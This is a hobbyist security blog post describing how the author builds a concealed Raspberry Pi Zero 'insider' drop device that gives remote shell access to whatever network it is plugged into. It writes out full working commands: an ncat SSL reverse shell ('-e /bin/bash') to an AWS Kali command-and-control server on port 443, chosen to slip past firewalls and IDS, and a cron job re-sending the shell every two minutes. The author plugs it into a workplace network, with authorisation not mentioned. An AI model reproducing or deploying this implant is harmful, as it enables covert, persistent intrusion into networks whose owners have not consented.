Cyber Security

Raspberry Spy: How Daniel Built His Own Red-Team Tool

Share this post:

Recently I’ve taken my first steps into the wonderful world of the Raspberry Pi. I know you’re probably thinking what took me so long, right? But hey, better late than never. Anyway, now I’m kinda hooked on the things and I’ve become a solution looking for a problem; always on the hunt for a cool new project. This was the impetus of my latest project. Let me break it down for you.

The big idea

I wanted to do something with a Ras Pi Zero that would incorporate my love for red-teaming/offensive security, and I wanted it to take as many paths of least resistance as possible, and it couldn’t be super expensive ($50-ish USD). Now that I had the basic (albeit arbitrary) parameters in place, all I had to do was come up with the problem to solve. Think, think, think…

I’ve got it! A Ras Pi Zero is pretty small, which makes it easy to conceal. What about using it as an “insider” threat device that can…

  • Be dropped on-site of the target
  • Connect via ethernet cable or wifi
  • Be powered by USB or powerpack
  • Auto-connect to Command-and-Control(C2) server
  • Be accessible by mobile device like smart phone
  • Full Linux with pentesting tools

Now I can already hear some of you saying,

“Doesn’t Hak5 make something that does that?” 

They sure do! It’s called a LAN Turtle and it’s an awesome product (I currently own 2). But like I said before, I’m a solution looking for a problem and even though things like this already exist, that doesn’t mean I can’t ‘roll my own’ so to speak. For me, the fun of it all is in the building, the struggling, the learning, and the creating something that’s custom to my way of doing things. And I assure you this project was all those things.

The first thing I needed to do before I got this party started was to make sure I could get this to work before I started purchasing gear. To that I looked to what I already had in front of me (remember, we are hitting the ‘easy’ button as often as possible) and that was my laptop.

I want to get a shell from a device that is inside a NATed/firewalled network and get that shell from my mobile device no matter where I am in the world. It also made sense to encrypt that communication to keep things secure from prying eyes and maybe even avoid IDS/IPS detection.

At first I though about just using SSH, but I wasn’t sure how I would get the internal IP address of the device. What if I had to deal with NATing? No, it would be too much work to try and connect from the outside, in. That means I need to connect from the inside, out to my mobile. I don’t think that would be too much of a problem, maybe just use netcat to push a shell to my mobile, but then I need to set up some way for the Ras Pi to find my mobile IP meaning I’ve got the same problem, just in reverse. It was at this point I realized I needed an Internet-facing device with a static IP. This would be the ‘bridge’ that both the Ras Pi and my mobile device would connect to, allowing one to contact the other.  Here’s a graphic of the topology.

Topology

Proof of concept

So the idea here is to spin up an EC2 instance in AWS to act as my ‘bridge’ or maybe better labeled as a C2 server, but essentially it will be doing both jobs. I already have an Amazon account, so it was the path of least resistance (easy button) to getting an internet facing device up and running with minimal time and effort and for a very reasonable price point.

I went with the Kali AMI I found in the Amazon Marketplace and configured it as a t2 micro which is currently running $0.012/hr. Also, I needed to provision it with an ‘Elastic IP’. This is a static IP you can get from AWS for FREE when it is connected to a running instance and for only $0.006/hr when the instance isn’t running (or the IP isn’t associated with an interface).

Once the instance was started, I connected using SSH and ran updates as well as changed the default root/user passwords. I then needed to open a port on the AWS firewall to allow for the incoming shell connections. I chose port 443 as that is standard internet traffic and probably won’t get caught by a firewall. All that work took roughly 20-30 minutes to complete.

Next, I needed to see if I could make a netcat reverse shell connection from my laptop to the C2 server. For what I’m going to do, I want to use ‘ncat’ and not the traditional ‘netcat’ or ‘nc’. This meant I had to install them on both my C2 Kali instance as well as my laptop’s WSL Kali instance.

Once that was done from the C2 in AWS I ran…

┌──(kalikali)-[~]
└─$ sudo nc -nvlp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Then from my laptop WSL Kali I ran…

dlowrie@DESKTOP-9Q3PR2A:~$ nc -nv [C2-Elastic-IP] 443 -e /bin/bash

Looking back at my C2 SSH terminal I find…

Ncat: Connection from [Laptop-IP]
Ncat: Connection from [Laptop-IP]:1917

Excellent! But not perfect. This is all running in clear text…over the internet! Let’s make this a little more secure, shall we?

Cryptic writings

The reason I chose to use ncat is because it supports SSL for encrypting connections. I just need to generate .crt and .key file, then concatenate them together into a .pem file. From my WSL Kali on my laptop I ran…

dlowrie@DESKTOP-9Q3PR2A:~$ openssl req -newkey rsa:2048 -nodes -keyout spy.key -x509 -days 1000 -subj ‘/CN=www.fakecompany.com/O=FakeCompany./C=US’ -out spy.crt
Generating a RSA private key
……………….+++++
…………………….+++++
writing new private key to ‘spy.key’
—–

Then I just cat the two files together and redirect the output to a .pem file.

dlowrie@DESKTOP-9Q3PR2A:~$ cat spy.key spy.crt > spy.pem

Now, I need to securely copy the spy.pem file up into the C2 server.  To do that I will employ SCP.

dlowrie@DESKTOP-9Q3PR2A:~$ scp -i C2-SSH-Key.pem ./spy.pem kali@[C2-Elastic-IP]:/home/kali

 With both devices in possession of the spy.pem file, I should now be able to create an SSL encrypted reverse shell connection from my laptop to the C2 server in AWS. Let’s see if it all works!

I connect to the C2 Kali with SSH and setup the listener…

┌──(kalikali)-[~]
└─$ sudo ncat –ssl-key spy.pem –ssl-cert spy.pem -nvlp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Then I send the shell with WSL Kali…

dlowrie@DESKTOP-9Q3PR2A:~$ncat –ssl-key spy.pem –ssl-cert spy.pem -nv [C2-Elastic-IP] 443 -e /bin/bash
Ncat: Version 7.91 ( https://nmap.org/ncat )

dlowrie@DESKTOP-9Q3PR2A:~$ ncat –ssl-key spy.pem –ssl-cert spy.pem -nv [C2-Elastic-IP] 443 -e /bin/bash

Ncat: Version 7.91 ( https://nmap.org/ncat )

Looking back at my C2 Kali listener I see the connection come in and I start throwing commands at it to see if all is working…

Ncat: Connection from [Laptop-IP].
Ncat: Connection from [Laptop-IP]:41433.
hostname
DESKTOP-9Q3PR2A
whoami
dlowrie
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
dlowrie@DESKTOP-9Q3PR2A:~$

dlowrie@DESKTOP-9Q3PR2A:~$

Is it terminal, doc?

Now we are cooking! I’m feeling good. I’m getting excited. One last step and things will really be looking good. I need to login to the C2 in AWS with SSH from my mobile phone.

There are a plethora of SSH connection apps in the Google Play/Apple App Store, so feel free to use what you like, but I’ve already got a terminal emulator(Termux) installed on my device so I’m going to use that. Here’s the issue though. I need to securely copy my AWS C2 private key(C2-SSH-Key.pem) to my device and then get access to it with Termux. Also, Termux doesn’t allow me to access the device’s internal storage by default, so I need to configure it so that I can copy the key to a convenient directory in Termux.

To accomplish all this, I had to do some Google-Fu and found this page…

https://wiki.termux.com/wiki/Internal_and_external_storage

Following the guide I was able to set the Termux app permissions to be able to access the phone’s local file system. Then from Termux run…

$ pkg install termux-api

After that I can access the local file system, copy the SSH key to the default Termux working directory, and set the appropriate file permissions for the key.

$ ls ~/storage/downloads
$ cp ~/storage/downloads/C2-SSH-Key.pem .
$ chmod 600 C2-SSH-Key.pem

Now all we need to do is SSH into the C2 server.

$ ssh -i C2-SSH-Key.pem kali@[C2-Elastic-IP]
┌──(kalikali)-[~]
└─$

Now I can fire up the SSL-encrypted ncat listener and grab the shell from my laptop all from the convenience of my mobile phone!

Would you like some Pi?

At this point I have all the basic moving parts configured, tested, and working. I just need to swap my laptop out for the Ras Pi…which I now need to purchase since this seems like it’s all going to work. Let’s go shopping!

A quick search on Amazon.com and I find this all-in-one kit

Raspberry Pi Starter Kit on Amazon

Since this is my first Zero, I will need all the extras in the kit, so I hit the ‘Buy Now’ button and 3 days later it arrived.

I put the thing together and fired it up. It came pre-installed with NOOBS, and I considered going with Kali for like a second, but then I just went with the ‘easy button’ and kept NOOBS on it. After all, I can install any pentesting tool I need after it’s ready to deploy.

So I connect to my home wifi network, install updates, change default passwords, install some pentesting tools, install ncat, and configure the startup options to just boot to TTY with no auto login. With those house-cleaning items out of the way I just need to configure it to attempt to beacon a shell to the C2 in AWS.

To do this I will need to get the spy.pem file over to the Zero. I can use scp to do this, but I think I just copied it from my laptop using python as an http server and wget.

Serving HTTP with python on my laptop

dlowrie@DESKTOP-9Q3PR2A:~$ sudo python3 -m http.server 8888
[sudo] password for dlowrie:
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) …

Copying file to Ras Pi with wget

pi@RPZero:~$ wget http://10.10.10.2:8888/spy.pem
–2021-02-20 15:38:55–  http://10.10.10.2:8888/spy.pem
Connecting to 127.0.0.1:8888… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2916 (2.8K) [application/pem-certificate-chain]
Saving to: ‘spy.pem’

spy.pem                       100%[=================================================>]   2.85K  –.-KB/s    in 0s
2021-02-20 15:38:55 (170 MB/s) – ‘spy.pem’ saved [2916/2916]

Anyway, now that I have spy.pem on the Zero I just need to set up a cron job to attempt to create the SSL encrypted shell connection. I’m going to have it run this job every 2 minutes, that way I don’t have some crazy long wait before getting the connection.

pi@RPZero:~$ crontab -e

Add line

*/2 * * * * ncat –ssl-key /home/pi/spy.pem –ssl-cert /home/pi/spy.pem -nv [C2-Elastic-IP] 443 -e /bin/bash

Save and exit.

Now it’s time for the moment of truth. Will it connect?

I grab my phone and launch Termux. Then I connect to the C2 server with SSH. Once logged in there I use ncat to start the listener and I wait. Tic. Toc. Tic. Toc. It seems like an eternity has gone by and I still don’t have a shell! What did I do wrong? What setting did I misconfigure? Is the stupid thing even on? I see an LED, so I think…Wait what’s that?

┌──(kali㉿kali)-[~]
└─$ sudo ncat –ssl-key spy.pem –ssl-cert spy.pem -nvlp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from [RPZero-IP].
Ncat: Connection from [RPZero-IP]:51931.
hostname
RPZero
whoami
pi
python -c ‘import pty;pty.spawn(“/bin/bash”)’
pi@RPZero:~$

Alright!!! It works! I’ve basically won this little game at this point, but I’m not completely over the finish line just yet.

Finishing touches

I still need to see if this will run off of a portable powerpack and I have to give it wired ethernet capabilities. Which means I have to go shopping again.

I wasn’t in the mood to wait, so I shuffled over to Wal-Mart and grabbed an Onn Portable Battery for $6.88

oon. Portable Battery on Walmart

This actually worked better than expected! I ran the Zero off of it for almost 4hrs (using wifi) and it only drained it by 1/4th of a charge.

I went back to Amazon for an ethernet adapter.

Ethernet Adapter for Linux on Amazon

 

Once that came in I took it to work to test it. I plugged the Zero into the back of a desktop computer for USB power and grabbed a free network cable and plugged into an open port near by. Fired up Termux on the smart phone and waited. Within 2 minutes I was greeted by a happy little shell!

What a fun project! Now I can drop this thing anywhere I like and have access to that network from anywhere! If I can get a wifi password then I can ditch the ethernet adapter and can just connect the battery and tuck our little spy in some out of the way area and we’re in business. I will admit that the shell can get flaky if you leave it connected and are idle for too long, so I’m already thinking of ways to make that more stable, but I’m still really happy with my results. I hope this inspires you to build something or hack something (legally of course).

Happy Hacking.